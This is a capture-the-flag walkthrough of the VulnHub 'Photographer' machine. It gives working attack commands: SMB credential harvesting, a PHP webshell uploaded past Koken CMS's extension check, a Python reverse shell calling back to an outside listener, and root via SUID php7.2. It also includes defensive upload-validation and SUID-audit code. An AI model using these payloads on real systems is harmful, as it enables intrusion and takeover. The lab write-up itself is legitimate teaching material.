
Writeup for Photographer machine from VulnHub

Machine: Photographer
Vulnerability: Arbitrary File Upload (Authenticated).
Explanation: The Koken CMS upload restrictions are based on a list of allowed file extensions (whitelist), which facilitates bypass through the handling of the HTTP request via Burp.
Privilege Escalation Vulnerability: SUID binary abuse.
Explanation: /usr/bin/php7.2 has the SUID bit set, which allows a non-root user to run commands as root using the -r switch.

Enumeration

Nmap scan

I started with an nmap scan which revealed four open ports.

$ nmap 192.168.56.104 -sV -sC
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))

SMB Enumeration

I used smbclient to enumerate the SMB server running on port 445. I started off by listing its shares.

$ smbclient -L 192.168.56.104 -N

I found a share named sambashare, which I was able to access anonymously.

$ smbclient //192.168.56.104/sambashare -N
smb: \> ls

There were two files, mailsent.txt and wordpress.bkp.zip, and I downloaded them both.

smb: \> get mailsent.txt
smb: \> get wordpress.bkp.zip

mailsent.txt contained an email with its headers.

$ cat mailsent.txt 
Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <agi@photographer.com>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <daisa@photographer.com>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

It didn’t seem important at first, but there was a use for it later on.

The other file wordpress.bkp.zip did not contain anything important.

Web Enumeration

There were two Apache web servers running, on port 80 and port 8000.

Port 80 :

I browsed to the first one, but I did not find anything useful.
I also did not find any hidden resources using gobuster.

So, I moved to the next one.

Port 8000 :

This is the home page of the web server running on port 8000.

I used gobuster to find any hidden resources.

$ gobuster dir -u http://192.168.56.104:8000 \
--status-codes-blacklist 404,403 \
--exclude-length 0 \
-w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt

--exclude-length 0: exclude the following content length (completely ignores the status)

I was able to find an admin portal on /admin.

The credentials I used to log in were found in mailsent.txt, which I retrieved from the sambashare share.

Email address: daisa@photographer.com
Password: babygirl

This is the Koken Content Management System (CMS), which is vulnerable to an Arbitrary File Upload when the user is authenticated.

To exploit this vulnerability I used an exploit found at exploit-db.

Initial Foothold

I created a php script and saved it as image.php.jpg.

$ echo '<?php system($_GET["cmd"]);?>' > image.php.jpg

I went back to the admin page, clicked on Import content at the bottom right of the page, uploaded image.php.jpg, and sent the request to Burp Suite.

I changed the name to image.php, and forwarded the request.
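The rename above works because the extension check ran only in the browser and the server kept whatever filename arrived in the request. As an added illustration (not Koken's code), the weak pattern is shown next to a hardened server-side validator; the allowlist, the magic-byte table, UploadRejected and the function names are assumptions.

```python
import re
import secrets

# Hypothetical gallery upload endpoint (added example, not Koken's code).
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
MAGIC = {  # leading bytes each accepted format must start with
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# A plain name with at least one extension; no path separators, no leading dot.
FILENAME_RE = re.compile(r"[^./\\]+(?:\.[^./\\]+)*\.([A-Za-z0-9]+)")


class UploadRejected(ValueError):
    pass


def weak_store_name(client_filename: str) -> str:
    """Vulnerable pattern: the extension check ran in the browser, so the server
    keeps whatever name arrives. A request edited in a proxy to say 'image.php'
    is stored as image.php under the web root, where Apache will execute it."""
    return client_filename


def hardened_store_name(client_filename: str, data: bytes) -> str:
    """Server-side validation: last-extension allowlist, magic-byte check, and a
    server-generated name so the client never decides what lands on disk."""
    m = FILENAME_RE.fullmatch(client_filename)
    if not m:  # no extension, path separators, or a name like '.htaccess'
        raise UploadRejected("invalid filename")
    ext = m.group(1).lower()
    # Only the LAST extension counts: 'image.php.jpg' -> 'jpg' (must still match
    # the bytes below), 'image.php' -> 'php' and is refused outright.
    if ext not in ALLOWED_EXT:
        raise UploadRejected("extension not allowed")
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        raise UploadRejected("content does not match extension")
    # Random name with a canonical extension; also serve the storage directory
    # with PHP execution disabled so a slip here still cannot run code.
    return f"{secrets.token_hex(8)}.{'jpg' if ext == 'jpeg' else ext}"


def is_accepted(client_filename: str, data: bytes) -> bool:
    """True if the hardened validator would store the file, False otherwise."""
    try:
        hardened_store_name(client_filename, data)
        return True
    except UploadRejected:
        return False
```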

After the upload was done, I went back to the Koken CMS Library, selected the newly uploaded file, right-clicked on Download File and copied the link.

To test it I used curl and sent a request to the link I copied, and I got a response with the output of the command I provided as a query.

$ curl http://192.168.56.104:8000/storage/originals/43/f5/image.php?cmd=id

After getting a working webshell, I tried to get a reverse shell.

Reverse shell

To get a reverse shell I used this python payload found here.

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.105",1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

I started a listener using netcat.

$ nc -lnvp 1337

I executed the payload with the webshell.

$ curl 'http://192.168.56.104:8000/storage/originals/43/f5/image.php?cmd=python3%20%2Dc%20%27import%20socket%2Cos%2Cpty%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22192%2E168%2E56%2E105%22%2C1337%29%29%3Bos%2Edup2%28s%2Efileno%28%29%2C0%29%3Bos%2Edup2%28s%2Efileno%28%29%2C1%29%3Bos%2Edup2%28s%2Efileno%28%29%2C2%29%3Bpty%2Espawn%28%22%2Fbin%2Fsh%22%29%27'

And I got a connection back on the nc listener.

To get a fully functioning shell I stabilized it using the following commands.

$ python3 -c 'import pty; pty.spawn("/bin/sh")'
$ export TERM=xterm
$ ^Z (CTRL+Z)
kali$ stty raw -echo; fg

After stabilizing the shell, I got the user flag.

$ cd /home/daisa
$ cat user.txt

Privilege Escalation

I listed all files with the SUID bit set, to see if there was a binary I could use to escalate my privileges.

$ find / -type f -perm -u=s 2>/dev/null

The interesting binary I found was /usr/bin/php7.2.

php can be used to escalate privileges according to GTFOBins.
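A defender's counterpart to the SUID hunt above, as an added example that is not from the post: it runs the find output through a baseline of expected setuid files and flags interpreters such as php7.2, whose SUID bit is what makes the -r trick work. The baseline set and the sample find output are constructed assumptions.

```python
import re

# Constructed sample of what `find / -type f -perm -u=s 2>/dev/null` printed on
# this box: the usual setuid helpers plus the interpreter the writeup abuses.
SAMPLE_FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/php7.2
/bin/su
/bin/mount
/usr/lib/openssh/ssh-keysign
"""

# Baseline of SUID files an Ubuntu host like this one is expected to carry.
# Assumption: build this set from a clean image of your own distribution.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/fusermount",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Interpreters and shells, with optional version suffix (php7.2, python3.6, ...).
# Any of these set SUID root hands a root shell to every local user.
INTERPRETER_RE = re.compile(r"^(php|python|perl|ruby|node|lua|bash|sh|dash|zsh)[0-9.]*$")


def triage_suid(find_output: str) -> dict:
    """Sort SUID paths into expected, unexpected and critical (unexpected AND an
    interpreter or shell). Remediation for the last group is `chmod u-s <path>`;
    php keeps working for the web server, which never needed the bit."""
    result = {"expected": [], "unexpected": [], "critical": []}
    for line in find_output.splitlines():
        path = line.strip()
        if not path:
            continue
        if path in EXPECTED_SUID:
            result["expected"].append(path)
            continue
        result["unexpected"].append(path)
        if INTERPRETER_RE.match(path.rsplit("/", 1)[-1]):
            result["critical"].append(path)
    return result
```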

I used the following command to get a shell as root.

$ php7.2 -r "pcntl_exec('/bin/bash', ['-p']);"

After that I got the root flag.

$ cd /root
$ cat proof.txt

This post is licensed under CC BY 4.0 by the author.